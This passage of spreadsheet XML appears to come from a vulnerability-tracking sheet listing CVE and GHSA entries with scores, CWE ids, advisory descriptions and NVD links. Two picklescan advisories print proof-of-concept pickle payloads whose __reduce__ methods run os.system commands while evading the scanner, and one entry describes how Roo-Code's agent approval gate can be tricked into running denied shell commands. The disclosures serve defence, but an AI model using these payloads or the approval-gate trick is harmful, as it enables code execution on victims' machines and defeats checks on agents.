      </c>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80134</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81016</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86/amd/pmc: Propagate SMU errors and validate S2D address
amd_stb_s2d_init() discards the return value of several S2D SMU commands.
When the SMU refuses a command (e.g. "SMU cmd failed. err: 0xff") the
failure is only noticed indirectly - if at all - and reported as -EIO,
masking the real error.
More seriously, the S2D_PHYS_ADDR_LOW/HIGH return values are ignored, so
on failure phys_addr_low/hi are left uninitialised and the assembled
address is passed straight to devm_ioremap().  When the SMU leaves them at
zero this maps physical address 0 and trips the ioremap-on-RAM warning:
  amd_pmc AMDI000B:00: SMU cmd failed. err: 0xff
  ioremap on RAM at 0x0000000000000000 - 0x0000000000ffffff
  WARNING: CPU: 13 PID: 4592 at arch/x86/mm/ioremap.c:...
Check the return value of each SMU command and propagate it, and reject a
zero physical address before calling devm_ioremap().</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81016</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82537</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="S433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89060</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr">
        <is>
          <t>CWE-551</t>
        </is>
      </c>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>A cross-namespace authorization flaw in multicluster-observability-addon allows a user with permission to modify a managed cluster’s ManagedClusterAddOn configuration to reference ClusterLogForwarder or OpenTelemetryCollector resources outside the permitted namespace. If those resources reference Secrets, the add-on may copy the referenced Secrets to the attacker-controlled managed cluster.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89060</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89099</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>A race condition in the document value layer of MongoDB Server can allow concurrent server threads to operate on the same internal memory without synchronization, leading to memory corruption. An authenticated user holding ordinary read-write privileges on a database may be able to trigger this condition over the normal client protocol, resulting in server termination and potential corruption of process memory with user-influenced content. Successful use of this issue may impact the confidentiality, integrity, and availability of the affected server process.</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89099</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89466</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: qcom_battmgr: terminate the strings from firmware
The qcom_battmgr_sc8280xp_strcpy() takes a Pascal-style string when the
firmware sends one. Otherwise it copies all BATTMGR_STRING_LEN bytes and
leaves the destination without a terminator.
Those destinations are model_number, serial_number and oem_info, each
BATTMGR_STRING_LEN and declared next to each other. They go out to user
space as val-&gt;strval, which power_supply_format_property() prints with
"%s", so a firmware string that fills the whole field makes that read run
into the following members.
Use strscpy() so the copy always terminates, the way the SM8350 path
already does for the same field.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89466</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89720</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ubifs: fix out-of-bounds read in signature length check
ubifs_sb_verify_signature() bounds the on-disk ubifs_sig_node-&gt;len field
before handing the signature payload to verify_pkcs7_signature(), but the
check has the wrong sign:
	if (le32_to_cpu(signode-&gt;len) &gt; snod-&gt;len + sizeof(struct ubifs_sig_node))
The signature bytes start sizeof(struct ubifs_sig_node) (UBIFS_SIG_NODE_SZ,
64 bytes) into the node, so the payload is at most
	snod-&gt;len - sizeof(struct ubifs_sig_node)
bytes long. Adding the header size instead of subtracting it accepts a
declared length up to 2 * UBIFS_SIG_NODE_SZ larger than the node actually
holds -- past the end of c-&gt;sbuf, which is vmalloc(c-&gt;leb_size).
verify_pkcs7_signature() -&gt; pkcs7_parse_message() -&gt; asn1_ber_decoder()
is then handed that inflated length and reads beyond the allocation while
walking the DER headers. The node length comes straight from the mounted
image, so a crafted signed UBIFS image reaches this via
ubifs_read_superblock() before the signature is cryptographically checked.
snod-&gt;len is guaranteed to be &gt;= UBIFS_SIG_NODE_SZ by the node scanner
(c-&gt;ranges[UBIFS_SIG_NODE].min_len == UBIFS_SIG_NODE_SZ), so the corrected
subtraction cannot underflow. Legitimately signed images are unaffected: a
correct superblock never declares a signature longer than the node it is
embedded in.</t>
        </is>
      </c>
      <c r="S437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89720</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89743</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: nsm: bound the device-reported response length
nsm_sendrecv_msg_locked() stores the virtqueue used-ring length reported
by the NSM device into msg-&gt;resp.len without bounding it to the response
buffer. A malicious or buggy backend can report a length larger than the
response buffer; parse_resp_raw() then copies that many bytes out of the
fixed buffer to user space, disclosing adjacent kernel heap (an
out-of-bounds read). The request path already floors its length in
fill_req_raw(); the response path lacks the symmetric check.
Clamp the stored length to the size of the response buffer. Well-behaved
devices report no more than the posted buffer size, so conforming traffic
is unaffected.</t>
        </is>
      </c>
      <c r="S438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89743</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71348</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M439" s="5" t="inlineStr">
        <is>
          <t>0.0.28</t>
        </is>
      </c>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr"/>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the torch.utils._config_module.load_config function via the __reduce__ method. Then the victim checks whether the pickle file is safe using the Picklescan library. Because the library fails to detect any dangerous functions, the victim decides to pickle.load() this malicious file, leading to remote code execution.
### PoC
```
import pickle
from torch.utils._config_module import ConfigModule
class Evil:
    def __reduce__(self):
        return (os.system, ('whoami',))
class EvilTorchUtilsConfigModuleLoadConfig:
    def __reduce__(self):
        evil_payload = pickle.dumps(Evil())
        return ConfigModule.load_config, (None, evil_payload)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439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71348</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71357</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M440" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr"/>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using idlelib.pyshell.ModifiedInterpreter.runcommand function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcommand function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
from idlelib.pyshell import ModifiedInterpreter
from types import SimpleNamespace
class EvilIdlelibPyshellModifiedInterpreterRuncommand:
    def __reduce__(self):
        payload = "__import__('os').system('whoami')"
        fake_self = SimpleNamespace(
            locals={},
            tkconsole=SimpleNamespace(executing=False),
            rpcclt=None,
            debugger=None
        )
        return ModifiedInterpreter.runcommand, (fake_self, payload)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440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71357</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62109</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>Editor SQL Injection in Sky Addons for Elementor &lt;= 3.8.4 versions.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62109</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62112</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>Editor SQL Injection in Amelia &lt;= 2.4.9 versions.</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62112</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80943</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtlwifi: rtl8192du: check QoS TID before indexing tids
rtl92du_tx_fill_desc() uses ieee80211_get_tid() to read the QoS TID
from the 802.11 header and then uses it as an index into
sta_entry-&gt;tids[]. ieee80211_get_tid() returns the low 4-bit QoS TID
value, so the result can be in the range 0..15.
rtlwifi only allocates MAX_TID_COUNT entries for sta_entry-&gt;tids[], and
MAX_TID_COUNT is 9. A QoS TID greater than 8 therefore indexes past the
aggregation state array. Keep the default RTL_AGG_STOP state for
out-of-range TIDs, matching rtl92cu_tx_fill_desc().
This issue was detected by our static analysis tool and confirmed by
manual audit. UBSAN validation for the same bug pattern reports an
array-index-out-of-bounds access with index 10 for type
'rtl_tid_data [9]'.</t>
        </is>
      </c>
      <c r="S443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80943</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90460</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack Keystone before 29.0.3. Tokens obtained via delegated authentication methods (EC2 credentials, application credentials, OAuth1 access tokens, and trusts) are not blocked from creating, modifying, or deleting credentials via the /v3/credentials API. EC2-derived tokens can additionally read credential blobs, exposing TOTP MFA seeds and other secrets. Also, PATCH /v3/credentials does not validate the requested post-update project_id, allowing any delegated token to move a credential to an unauthorized project. All Keystone deployments using delegated authentication are affected.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90460</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>GHSA-8mc5-7w9m-fqv6</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M445" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr"/>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-j343-8v2j-ff7w. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.30 fails to detect malicious pickle files using idlelib.pyshell.ModifiedInterpreter.runcommand in reduce methods. Attackers can embed undetected code in pickle files that executes remote commands when loaded by victims.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-8mc5-7w9m-fqv6</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>GHSA-fcqg-3mwf-cfcf</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr">
        <is>
